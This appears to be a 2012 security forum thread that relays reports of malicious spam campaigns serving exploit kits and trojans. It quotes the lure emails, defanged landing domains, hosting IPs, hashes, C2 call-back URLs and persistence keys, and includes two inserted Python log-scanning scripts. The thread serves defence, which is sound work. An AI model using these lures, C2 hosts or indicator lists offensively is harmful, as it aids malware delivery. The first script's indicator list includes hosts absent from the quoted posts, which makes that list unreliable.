"... over the past 90 days, 5626 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-11-24, and the last time suspicious content was found was on 2012-11-24... we found 856 site(s) on this network... that appeared to function as intermediaries for the infection of 6279 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1369 site(s)... that infected 21258 other site(s)..."
___
Fake "Changlog 10.2011" SPAM / efaxinok .ru
- http://blog.dynamoo.com/2012/11/changlog-102011-spam-efaxinokru.html
23 Nov 2012 - "This spam leads to malware on efaxinok .ru:
Date: Fri, 23 Nov 2012 10:14:22 +0600
From: "Contact" [customer-notification @ ups .com]
Subject: Re: Changlog 10.2011
Attachments: changelog-212.htm
Good morning,
as promised changelog (Internet Explorer File)
The victim is enticed to click on the attachment which leads to a malicious payload on [donotclick]efaxinok .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186
203.80.16.81
208.87.243.131
216.24.196.66
These are the same IPs as used in this attack yesterday*, and it forms part of a long-running malicious spam run which appears to have been going on forever. Of note, there's a new domain in this cluster of delemiator .ru which I haven't seen yet being used in a malicious spam run, but it probably will be.
* http://blog.dynamoo.com/2012/11/facebook-spam-ceredinoplru.html
___
Fake FDIC ‘Your activity is discontinued’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/23/cybercriminals-spamvertise-millions-of-fdic-your-activity-is-discontinued-themed-emails-serve-client-side-exploits-and-malware/
Nov 23, 2012 - "A currently ongoing spam campaign attempts to trick users into thinking that their ability to send Domestic Wire Transfers has been disabled. Impersonating the Federal Deposit Insurance Corporation (FDIC), the cybercriminals behind the campaign are potentially earning thousands of dollars in the process of monetizing the anticipated traffic. Once users click on the bogus ‘secure download link’, they’re automatically exposed to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/fdic_email_spam_exploits_malware.png
... Client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
stifferreminders .pro – 198.27.94.80 (AS16276) – Email: kee_mckibben0869 @macfreak .com
Name Server:NS1.CHELSEAFUN .NET
Name Server:NS2.CHELSEAFUN .NET
These are well known name servers currently in use by the same cybercriminals that launched the following malicious campaigns – “‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware”; “‘Payroll Account Holded by Intuit’ themed emails lead to Black Hole Exploit Kit”; “‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit”; “Cybercriminals resume spamvertising ‘Payroll Account Cancelled by Intuit’ themed emails, serve client-side exploits and malware”.
The following malicious domains also respond to the same IP:
headerandfooterprebuilt .pro
fixedmib .net
stafffire .net ...
Upon successful client-side exploitation, the campaign drops MD5: 61bc6ad497c97c44b30dd4e5b3b02132 * ... UDS:DangerousObject.Multi.Generic.
Once executed, the sample phones back to hxxp ://182.237.17.180 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/.."
* https://www.virustotal.com/file/5de7a60969d0cba0b25ead750adb8518b564549ea5f9a87f875295c396effa98/analysis/
File name: test45286142972065.bin
Detection ratio: 2/43
Analysis date: 2012-11-21
:mad:
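One way to turn the defanged indicator lists quoted in the posts above into something a proxy log can be checked against, as an added example that is not code from dynamoo, Webroot or this thread: it re-fangs the list (those posts put a space before the TLD and use "hxxp ://" and "[donotclick]"), then flags log lines that hit a listed host, an exact landing or call-back URL, or the recurring :8080/forum/links/column.php landing path seen across the campaigns. The log format, the client addresses and the timestamps are constructed for the example; the indicators are the ones quoted above.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from the dynamoo/webroot excerpts above, kept in the
# defanged form those posts use (space before the TLD, "[donotclick]",
# "hxxp ://"). The log lines further down are constructed for this example.
RAW_INDICATORS = """
[donotclick]ceredinopl .ru:8080/forum/links/column.php
hamasutra .ru
monacofrm .ru
bamanaco .ru
efaxinok .ru
hxxp ://203.172.238.18 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
202.180.221.186
203.80.16.81
208.87.243.131
216.24.196.66
"""

# Blackhole landing-page paths that recur in the campaigns quoted above.
LANDING_PATHS = {"/forum/links/column.php", "/forum/links/public_version.php"}


def refang(token: str) -> str:
    """Undo blog-style defanging so an indicator can be matched literally."""
    token = token.strip().replace("[donotclick]", "")
    token = re.sub(r"^(?:hxxps?|https?)\s*://", "", token)
    token = re.sub(r"\s+\.", ".", token)  # "hamasutra .ru" -> "hamasutra.ru"
    token = re.sub(r"\s+:", ":", token)   # "18 :8080" -> "18:8080"
    return token.lower()                  # matching below is case-insensitive


def load_indicators(raw: str):
    """Split a defanged list into a host set and a host[:port]/path set."""
    hosts, urls = set(), set()
    for line in raw.splitlines():
        if not line.strip():
            continue
        item = refang(line)
        hosts.add(item.split("/", 1)[0].split(":", 1)[0])
        if "/" in item:
            urls.add(item)
    return hosts, urls


# Constructed proxy log format: "<ts> <client> <method> <url> <status>".
LOG_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

# Constructed sample traffic: one infection chain (landing page, then the
# Cridex call-back), one benign request, and one hit on the domain that the
# dynamoo post above says had not been used yet.
LOG_LINES = """
2012-11-22T01:31:02Z 10.0.0.15 GET http://ceredinopl.ru:8080/forum/links/column.php?cfcjm=xbc229&fnhcuc=njx 200
2012-11-22T01:31:09Z 10.0.0.15 POST http://203.172.238.18:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ 200
2012-11-22T01:32:40Z 10.0.0.22 GET http://www.example.com/index.html 200
2012-11-22T01:33:11Z 10.0.0.31 GET http://delemiator.ru:8080/forum/links/column.php 200
"""


def classify(url: str, hosts: set, urls: set) -> list:
    """Return the reasons a requested URL matches the campaign indicators."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    key = host + (f":{parts.port}" if parts.port else "") + parts.path
    reasons = []
    if host in hosts:
        reasons.append("host on campaign blocklist")
    if key.lower() in urls:
        reasons.append("exact landing/C2 URL match")
    # Heuristic: the exploit-kit landing path on :8080 also catches domains
    # that were not on the list yet (delemiator .ru in the sample log).
    if parts.port == 8080 and parts.path in LANDING_PATHS:
        reasons.append("blackhole landing path on :8080")
    return reasons


def scan_log(text: str, hosts: set, urls: set) -> list:
    """Return (client, url, reasons) for every log line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        _ts, client, _method, url, _status = m.groups()
        reasons = classify(url, hosts, urls)
        if reasons:
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    known_hosts, known_urls = load_indicators(RAW_INDICATORS)
    for client, url, why in scan_log(LOG_LINES, known_hosts, known_urls):
        print(client, url, "; ".join(why))
```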
AplusWebMaster
2012-11-27, 04:25
FYI...
Phishing SCAM asks for TAN list photo
- http://h-online.com/-1757018
26 Nov 2012 - "A new phishing email circulating in Germany is asking customers of the country's largest banking establishment, Deutsche Bank, to upload photographs or scans of their bank-issued TAN (Transaction Authentication Number) list to a maliciously fabricated web site. TANs are used by many banks in Germany to authenticate transactions during online banking sessions. The customer receives a printed list of TANs, essentially one-time passwords, via mail and has to use a randomly selected number from the list each time they want to send money or approve other transactions. The phishing email directs users to a deceptive web page where the scammers claim that the upload of the TAN list is needed as Deutsche Bank supposedly changes their iTAN technology for a mobile TAN (mTAN) system on 1 January 2013... The short time frame is apparently designed to increase the pressure on the victims of the phishing emails. The H's associates at heise online received copies of similar emails that were apparently asking for the information to be uploaded by the next day or the customer's account would be disabled... The web sites are a professional reproduction of Deutsche Bank's actual online banking interface..."
___
- https://isc.sans.edu/diary.html?storyid=14578
Last Updated: 2012-11-27
>> http://www.antiphishing.org/resources/apwg-reports/
:mad::fear:
AplusWebMaster
2012-11-27, 15:50
FYI...
Bogus Facebook ‘pending notifications’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/27/bogus-facebook-pending-notifications-themed-emails-serve-client-side-exploits-and-malware/
27 Nov 2012 - "A recently launched malicious spam campaign is impersonating Facebook, Inc. in an attempt to trick its one billion users into thinking that they’ve received a notification alerting them on activities they may have missed on Facebook. Upon clicking on any of the links found in the email, users are exposed to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/facebook_pending_notifications_email_spam_exploits_malware1.png
... Malicious payload serving URL: hxxp ://ceredinopl .ru:8080/forum/links/column.php?cfcjm=xbc229&fnhcuc=njx&svdp=2v:1k:1m:32:33:1k:1k:31:1j:1o&xdva=
Sample client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
ceredinopl .ru – 203.80.16.81 (AS24514); 208.87.243.131; 216.24.196.66 (AS40676); 202.180.221.186 (AS24496)...
Upon successful client-side exploitation the campaign drops MD5: 9db13467c50ef248eaf6c796dffdd19c * ...PWS-Zbot.gen.aqw.
Responding to the same IPs – 203.80.16.81 (AS24514); 208.87.243.131; 216.24.196.66 (AS40676); 202.180.221.186 (AS24496)...
If users feel they received a bogus email that may not be coming from Facebook, they can alert Facebook by forwarding the message to phish@fb.com . In addition, users can check to see if their account has been compromised by visiting https://www.facebook.com/hacked ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/1748f38a7c0d4ac1aa023dac666727fb799ded5fc946b2b7732cc3a5da51290d/analysis/
File name: 413823066bcca9a7b298015fcba37b74a94d1950
Detection ratio: 28/43
Analysis date: 2012-11-25
___
Fake Browser Updates - Malicious Ads...
- http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-ads-push-fake-browser-updates/
Nov 26, 2012 - "Thinking of updating your web browsers? Just make sure that you download from legitimate sources, instead of downloading malware disguised as browser updates onto your system. Just recently, we were alerted to a report* of several websites offering updates for Internet browsers like Firefox, Chrome, and Internet Explorer just to name some. Users may encounter these pages by clicking malicious ads. The bad guys behind this threat made an effort to make this ruse appear legitimate. These pages, as seen below, were made to look like the browsers’ official sites. To further convince users to download the fake update, the sites even offer an integrated antivirus protection:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/11/fake_update_browsers.gif
Instead of an update, users download a malware detected as JS_DLOADR.AET, which was found capable of changing the downloaded binary to have a different payload. The malicious JavaScript, in turn, downloads TROJ_STARTPA.AET and saves it as hxxp ://{BLOCKED}browserupdate/install.exe. Based on our initial analysis, the Trojan modifies the user’s Internet Explorer home page to hxxp ://{BLOCKED}rtpage .com, a site that may host other malicious files that can further infect a user’s system... To avoid this ruse, users must exclusively download updates from a legitimate source or the software vendor’s official websites. Many browsers also include an integrated auto-update feature..."
* http://stopmalvertising.com/malvertisements/securebrowserupdate.com-wants-to-update-your-browser-with-malware.html
securebrowserupdate .com = malvertisement...
23 Nov 2012 - "... Internet users are told that their current browser version is out of date and they are invited to install the latest update. Victims are redirected to securebrowserupdate .com via a malvertisement. The domain securebrowserupdate .com has been registered on the 16th November 2012 via name .com. The registrant details are protected by a privacy service..."
___
Bogus ‘Pay by Phone Parking Receipts’ serve malware
- http://blog.webroot.com/2012/11/27/cybercriminals-target-u-k-users-with-bogus-pay-by-phone-parking-receipts-serve-malware/
Nov 27, 2012 - "U.K users, beware! Cybercriminals are currently mass mailing yet another malicious spam campaign, enticing users into viewing a -bogus- list of parking transactions. Upon executing the malicious attachment, the malware opens a backdoor on the affected host, allowing the cybercriminals behind the campaign complete access to the host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/uk_pay_by_phone_receipt_email_spam_malware.png
Sample detection rate for the malicious attachment: MD5: fbde5bcb8e3521149d2f83888e1716c4 * ... Worm:Win32/Gamarue.I**
* https://www.virustotal.com/file/2e8f3a5fd6605821fbf071c1da6b90cb18903a433cf44776432625a4a1e58727/analysis/1353772427/
File name: Pay_by_Phone_Parking_Receipt.pdf.exe
Detection ratio: 38/44
Analysis date: 2012-11-24
** https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FGamarue.I
___
Fake Multiple ‘Inter-company’ invoice emails serve malware and client-side exploits
- http://blog.webroot.com/2012/11/27/multiple-inter-company-invoice-themed-campaigns-serve-malware-and-client-side-exploits/
27 Nov 2012 - "... cybercriminals have been persistently spamvertising ‘Inter-company invoice’ themed emails, in an attempt to trick users into viewing the malicious .html attachment, or unpack and execute the malicious binary found in the attached archives. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/inter_company_invoice_email_spam_exploits_malware.png
... Sample client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
controlleramo .ru
Name server: ns1.controlleramo .ru – 62.76.186.190
Name server: ns2.controlleramo .ru – 132.248.49.112
Name server: ns3.controlleramo .ru – 84.22.100.108
Name server: ns4.controlleramo .ru – 65.99.223.24 ...
Upon successful client-side exploitation the campaign drops MD5: de48416449621ecd62b116cc41aa5bcc * ... Worm:Win32/Cridex.E...
The second sample obtained from yet another spamvertised archive with MD5: 3a8ce3d72b60b105783d74dbc65c37a6 ** ... Worm:Win32/Cridex.E. Upon execution it phones back to the following URL: 188.40.0.138 :8080/AJtw/UCyqrDAA/Ud+asDAA (AS24940, HETZNER-AS)..."
* https://www.virustotal.com/file/cac2d05cab26c70c11ef6e2e37f6693b387fb9c86b10d58835d917375f6bbf6a/analysis/
File name: de48416449621ecd62b116cc41aa5bcc
Detection ratio: 30/44
Analysis date: 2012-11-11
** https://www.virustotal.com/file/245db8d2f65c7bb476be3d8d3c6c9edc6af9b4827b54ec988157a8ead358074d/analysis/1353769289/
File name: Invoices_12_N88283.exe
Detection ratio: 37/44
Analysis date: 2012-11-24
___
"Copies of Policies" spam / ganiopatia .ru
- http://blog.dynamoo.com/2012/11/copies-of-policies-spam-ganiopatiaru.html
27 Nov 2012 - "This spam leads to malware on ganiopatia .ru:
Date: Mon, 26 Nov 2012 02:31:10 -0500
From: sales1 @ victimdomain .com
Subject: RE: ALINA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
ALINA Prater,
==========
Date: Mon, 26 Nov 2012 02:26:33 +0300
From: ALISHIADBSukwQEf @aol .com
Subject: RE: ALISHIA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
ALISHIA Gee,
==========
From: accounting @ victimdomain .com
Sent: 26 November 2012 08:42
Subject: RE: MARCELLE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
MARCELLE SPENCE,
==========
From: accounting @ victimdomain .com
Sent: 26 November 2012 07:54
Subject: RE: KASSIE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
KASSIE ROMANO,
The malicious payload is at [donotclick]ganiopatia .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)
Note that ganalionomka .ru is also on the same cluster of servers and will also be malicious. These IP addresses have been used for malware several times; blocking access to them would be a good idea."
___
BeyondTek IT / beyondtekit .com SPAM
- http://blog.dynamoo.com/2012/11/beyondtek-it-beyond-tek-it.html
27 Nov 2012 - "Here's an annoying spammer.. but who are they exactly?
From: Nick Snow ---- BeyondTekIT Nick @ beyondtekit .com
Date: 27 November 2012 10:24
Subject: Your IT Jobs - HR
Hello:
The IT market is extremely HOT right now and there is no doubt that, there is a severe shortage of qualified, experienced IT candidates and an over-abundance of IT jobs being advertised by companies all over the country. It seems, most qualified candidates are in such high demand that they are getting multiple offers, which is making it difficult for companies to fill certain positions.
That being said please let me know if you currently have any hard-to-fill IT positions at that we could provide candidates for. We can assist with contract, contract-to-hire/temp-to-perm, or permanent positions.
We have candidates available across all technologies and skill-sets, including (this is only a partial list):
Programmers/Developers - Java, C++, .Net, Ruby, Web, Perl, Python, PHP, ColdFusion, etc
Systems Analysts / Business Analysts
QA Engineers/Analysts/Testers
DBA's - SQL Server, Oracle, MySQL, etc
SAP Consultants - Technical, Functional, Techno-Functional, Analysts, Developers
Oracle Consultants - Technical, Functional, Techno-Functional, Analysts, Developers
Data Warehouse/Business Intelligence Developers/Engineers - ETL, SSIS, SSAS, SSRS, Cognos, etc
Project Managers
Systems Administrators - Linux, Window, etc
Executive - CIO, CTO, VP of IT, etc
PS - We have just started offering our clients a business model of hiring off-site developers, who can be your employees but working from our office in India. Please ask me for more details, and I can send you our PowerPoint presentation.
Thank you.
Nick Snow
BeyondTek IT
Tel: 714-572-1544
nick @ beyondtekit .com
www .BeyondTekIT .com
The spam (and it is spam) originates from a server on 216.14.62.75 (Telepacific Communications, Los Angeles) which also hosts the beyondtekit .com and beyondtechit .com domains...
I personally wouldn't recommend giving any personal details to spammers, and I certainly wouldn't recommend giving details to a company that seems to spend some effort to conceal who they really are. But, bear in mind that there are no anti-spam laws in India which explains the high level of Indian spam messages (think SEO spam)..."
AplusWebMaster
2012-11-28, 03:05
FYI...
Wire transfer SPAM / gurmanikia .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-spam-gurmanikiaru.html
27 Nov 2012 - "This fake wire transfer spam leads to malware on gurmanikia.ru:
Date: Tue, 27 Nov 2012 01:14:15 -0500
From: Emerita Ayers via LinkedIn [member @ linkedin .com]
Subject: RE: Your Wire Transfer N27172774
Dear Customers,
Wire debit transfer was canceled.
Canceled transfer:
FED NUMBER: 6946432301WIRE298280
Transaction Report: View
Federal Reserve Wire Network
The malicious payload is at [donotclick]gurmanikia .ru:8080/forum/links/column.php hosted on the following well-known malicious IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)..."
___
FedEx SPAM / PostalReceipt .zip
- http://blog.dynamoo.com/2012/11/fedex-spam-postalreceiptzip.html
27 Nov 2012 - "A slightly new take on the malicious FedEx spam we've seen recently. This time, the link in the email goes to a hacked domain to download an attachment called PostalReceipt.zip
Date: Tue, 27 Nov 2012 13:04:37 -0400
From: "Office Mail" [no_replyFRL @ cleveland .com]
Subject: ID (I)JI74 384 428 2295 7492
FedEx
Order: AX-7608-99659670234
Order Date: Sunday, 25 November 2012, 10:35 AM
Dear Customer,
Your parcel has arrived at the post office at November 27.Our postrider was unable to deliver the parcel to you.
To receive a parcel, please, go to the nearest our office and show this postal receipt.
GET POSTAL RECEIPT
Best Regards, The FedEx Team.
FedEx 1995-2012
In this case the download site was [donotclick]amsterdam.cathedralsoft .com/TFOIATVZVT.html hosted on 46.105.140.157 (OVH, Spain). www .cathedralsoft .com is hosted on 94.23.187.176 (also OVH, Spain). It looks like cathedralsoft .com has been compromised in this attack.
VirusTotal detection rates are very low*. I don't currently have an analysis of the malicious payload."
* https://www.virustotal.com/file/f0b29e1f5616ea7dd35e041e7f4ece19692375530e3ae4b7a8e22249d0f2d9c4/analysis/1354056475/
File name: PostalReceipt.exe
Detection ratio: 1/44
Analysis date: 2012-11-27
AplusWebMaster
2012-11-28, 10:01
FYI...
Bogus DHL emails serve malware
- http://blog.webroot.com/2012/11/28/bogus-dhl-express-delivery-notifications-serve-malware/
Nov 28, 2012 - "From UPS, USPS to DHL, bogus and malicious parcel tracking confirmations are a common social engineering technique often used by cybercriminals to trick users into clicking on malicious links or executing malicious attachments found in the spamvertised emails. Continuing what appears to be a working social engineering tactic, cybercriminals are currently mass mailing bogus DHL ‘Express Delivery Notifications’ in an attempt to trick users into executing the malicious attachment. Once executed, it opens a backdoor on the affected host allowing the cybercriminals behind the campaign complete access to the infected PC...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/dhl_express_tracking_notification_email_spam_malware.png
Sample detection rate for the malicious attachment: MD5: b0d4dad91f8e56caa184c8ba8850a6bd * ... Trojan-Downloader.Win32.Andromeda.daq.
What’s particularly interesting about this MD5 is that there are files named T-Mobile-Bill.pdf.exe that have also been submitted to VirusTotal, indicating that there’s -another- T-Mobile themed campaign that’s currently circulating in the wild. PEiD Signature of the file: BobSoft Mini Delphi -> BoB / BobSoft. It also creates %AllUsersProfile%\svchost.exe on the system, plus a Registry Value – [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] SunJavaUpdateSched = “%AllUsersProfile%\svchost.exe” so that svchost.exe runs every time Windows starts."
* https://www.virustotal.com/file/148a7751e26a29f07cfe21447798e91d5863389a8bc7da25c70b009f48e7f73e/analysis/1353774086/
File name: DHL-EXPRESS-DELIVERY-NOTIFICATION.exe
Detection ratio: 34/42
Analysis date: 2012-11-24
___
Fake Angry Birds Star Wars Android SMS Sender
- http://www.gfi.com/blog/the-fail-is-strong-with-this-one-angry-birds-star-wars-android-sms-sender/
Nov 28, 2012 - "Back in April, fake copies of Angry Birds Space were in circulation – with the recent release of Angry Birds Star Wars, scammers have caused a great disturbance in the Force, as if millions of phones cried out in terror and were suddenly silenced... Fake apps are once again the order of the day – here’s one our Labs have found and taken a look at, offered up for download from a dedicated website over at
angrybirdsstarwars-android(dot)ru [ 5.9.112.10 - AS24940**]
> http://www.gfi.com/blog/wp-content/uploads/2012/11/angrybirdsstarwarsfakeapp1.png
As with so many similar fakeouts, Android owners must download the app from the website then install it on their phone (downloading with anything other than your mobile device – say, a web browser – offers up a .jar file instead)... This one acts like a typical Boxer Android file, sending premium SMS messages before downloading a valid version of the software. All in all, a rather costly mistake given you could pay the one time fee for the legitimate Google Play download and Angry Bird yourself into a (non-scammed) frenzy instead. VirusTotal results can be found here*, and we detect this as Trojan.AndroidOS.Generic.A with VIPRE Mobile.
End-users should always be cautious of websites offering up Android files that aren’t the Google Play store, especially when based around a hot new property or must-have game..."
* https://www.virustotal.com/file/d1ebad2d042f2ccfc0f3b94141d69997280de84223007cad6b59346d0e309a69/analysis/1354052956/
File name: Angry_Birds_Star_Wars_install.apk
Detection ratio: 7/43
Analysis date: 2012-11-27
** https://www.google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 5998 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-11-28, and the last time suspicious content was found was on 2012-11-28... Over the past 90 days, we found 817 site(s)... that appeared to function as intermediaries for the infection of 4963 other site(s)... We found 1714 site(s)... that infected 9332 other site(s)..."
> http://sitevet.com/db/asn/AS24940
Blacklisted URLs: 3081
___
Changelog SPAM / ganadeion .ru
- http://blog.dynamoo.com/2012/11/changelog-spam-ganadeionru.html
28 Nov 2012 - "This fake changelog spam leads to malware at ganadeion .ru:
Date: Wed, 28 Nov 2012 05:21:35 -0500
From: LinkedIn Password [password @ linkedin .com]
Subject: Re: Changelog as promised (upd.)
Hello,
as prmised updated changelog - View
C. BERGMAN
The malicious payload is at [donotclick]ganadeion .ru:8080/forum/links/column.php hosted on some familiar looking IP addresses that you should block if you can:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)"
___
Fake UPS email serves Fake AV
- http://www.gfi.com/blog/festive-ups-delivery-notice-serves-up-fake-av/
Nov 28, 2012 - "... seasonal looking fake UPS delivery notification, claiming in broken English that “Your package delivered to the nearest Postal Office. When receiving, please show a mailing receipt. Address of the nearest office you can find on our website”.
> http://www.gfi.com/blog/wp-content/uploads/2012/11/tumblr_me5e2caxNI1r6pupn.png
Depending on the spam campaign you happen to stumble upon, you’ll most likely be redirected through a collection of websites before arriving at your final destination which in this case happens to be Fake AV – specifically, System Progressive Protection.
> http://www.gfi.com/blog/wp-content/uploads/2012/11/upsfakeav2.png
Fake UPS spam is a perennial favourite of Malware pushers... We detect the above as Lookslike.Win32.Winwebsec.p (v)... treat delivery notification emails with the utmost caution. If in doubt, simply visit the website of your chosen parcel delivery service and have fun typing in tracking codes instead. It’s a lot safer."
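Every landing URL quoted in these posts has the same shape, <domain>:8080/forum/links/column.php, and the same handful of hosting IPs keeps coming back. The script below is an added example (not code from dynamoo, Webroot or any of the quoted blogs) that applies those two indicators to proxy logs; the Squid-style log lines, client addresses and the example.org/intranet.local hosts are constructed, while the IP set is the one the posts list.

```python
"""Flag proxy requests matching the BlackHole landing-URL pattern quoted in
this thread.  Added example; the log lines below are constructed."""
from urllib.parse import urlsplit

# Path shared by every landing URL quoted in the posts; all of them use :8080
LANDING_PATH = "/forum/links/column.php"

# Hosting IPs the posts list for the column.php cluster
KNOWN_BAD_IPS = {"202.180.221.186", "203.80.16.81",
                 "208.87.243.131", "216.24.196.66"}

# Constructed Squid-style access.log lines:
# time elapsed client status/code bytes method url ident hierarchy/peer type
SAMPLE_LOG = """\
1354000001.123 342 10.0.0.12 TCP_MISS/200 5123 GET http://ceredinopl.ru:8080/forum/links/column.php?cfcjm=xbc229 - DIRECT/203.80.16.81 text/html
1354000002.456 210 10.0.0.15 TCP_MISS/200 7420 GET http://example.org/forum/links/column.php - DIRECT/5.6.7.8 text/html
1354000003.000 50 10.0.0.20 TCP_MISS/200 900 GET http://intranet.local/index.html - DIRECT/10.0.0.1 text/html
1354000004.000 120 10.0.0.21 TCP_MISS/200 3000 GET http://208.87.243.131:8080/forum/links/column.php - DIRECT/208.87.243.131 text/html
"""


def parse_line(line):
    """Pull client, URL and the peer IP Squid actually connected to."""
    f = line.split()
    if len(f) < 9:
        return None
    server_ip = f[8].split("/", 1)[1] if "/" in f[8] else ""
    return {"client": f[2], "url": f[6], "server_ip": server_ip}


def indicators(entry):
    """Return the indicators that fire for one request (empty list = clean)."""
    u = urlsplit(entry["url"])
    reasons = []
    if u.path == LANDING_PATH:
        reasons.append("blackhole_landing_path")
        if u.port == 8080:          # every sample in the thread used this port
            reasons.append("port_8080")
    # Match on the URL host (IP-literal URLs) and on the resolved peer address,
    # so a fresh .ru domain on a known server is still caught
    if u.hostname in KNOWN_BAD_IPS or entry["server_ip"] in KNOWN_BAD_IPS:
        reasons.append("known_bad_ip")
    return reasons


def scan(log_text):
    """Return (client, url, reasons) for every line that trips an indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        reasons = indicators(entry)
        if reasons:
            hits.append((entry["client"], entry["url"], reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(f"{client} -> {url}  [{', '.join(reasons)}]")
```

A path-only hit (second line) is weaker than path plus port plus known IP; the reasons list lets a SIEM rule weight them differently.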
AplusWebMaster
2012-11-29, 13:56
FYI...
Fake T-mobile U.K. malicious emails
- http://blog.webroot.com/2012/11/29/cybercriminals-impersonate-t-mobile-u-k-serve-malware/
Nov 29, 2012 - "Cybercriminals are currently impersonating T-Mobile U.K, in an attempt to trick its customers into downloading a bogus billing information report. Upon execution, the malware opens a backdoor on the affected host, allowing the cybercriminals behind the campaign complete access to the infected PC...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/t-mobile_uk_email_spam_billing_malware.png
... malicious executable: MD5: b0d4dad91f8e56caa184c8ba8850a6bd * ... Worm:Win32/Gamarue
That’s the same MD5 that was served in the recently profiled “Bogus DHL ‘Express Delivery Notifications’ serve malware” malicious campaign..."
* https://www.virustotal.com/file/148a7751e26a29f07cfe21447798e91d5863389a8bc7da25c70b009f48e7f73e/analysis/1353777713/
File name: T-Mobile-Bill.pdf.exe
Detection ratio: 35/44
Analysis date: 2012-11-24
___
Fake Vodafone U.K. malicious emails
- http://blog.webroot.com/2012/11/28/cybercriminals-impersonate-vodafone-u-k-spread-malicious-mms-notifications/
Nov 28, 2012 - "Over the past couple of days, cybercriminals have launched yet another massive spam campaign, once again targeting U.K users. This time, they are impersonating Vodafone U.K, in an attempt to trick its customers into executing a bogus MMS attachment found in the malicious emails. Upon execution, the sample opens a backdoor on the affected hosts, allowing the cybercriminals behind the campaign complete access to the affected PC...
Sample screenshot from the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/vodafone_uk_email_spam_malware_mms_notification.png
... malicious attachment: MD5: 3ce2b9522a476515737d07b877dae06e * ... Trojan-Downloader.Win32.Andromeda.coh.
Upon execution, the sample creates %AllUsersProfile%\svchost.exe on the host. It also creates a Registry Value - [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] -> SunJavaUpdateSched = “%AllUsersProfile%\svchost.exe” so that svchost.exe starts every time Windows starts..."
* https://www.virustotal.com/file/cd3e6a441f64afb86360aca4983db734e495e21df2d4d98422288a4f1664a480/analysis/1353773239/
File name: Vodafone_MMS.jpg.exe
Detection ratio: 36/44
Analysis date: 2012-11-24
___
More "Wire Transfer" SPAM / dimarikanko .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-spam-dimarikankoru.html
29 Nov 2012 - "This fake "Wire Transfer" spam leads to malware on dimarikanko .ru:
Date: Thu, 29 Nov 2012 06:01:55 +0700
From: LinkedIn Connections [connections @ linkedin .com]
Subject: Re: Fwd: Wire Transfer (75631MU030)
Dear Bank Account Operator,
WIRE TRANSFER: FED675249061747420
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]dimarikanko .ru:8080/forum/links/column.php hosted on a bunch of familiar looking IP addresses which have been used in several recent attacks:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)..."
___
Vobfus sites to block
- http://blog.dynamoo.com/2012/11/vobfus-sites-to-block.html
29 Nov 2012 - "These domains and sites appear to be connected to the Vobfus worm, hosted on 222.186.36.108 (Chinanet Jiangsu Province Network). There seems to be quite a bit of this -worm- about..."
(More detail at the dynamoo URL above.)
What’s the Fuss with WORM_VOBFUS?
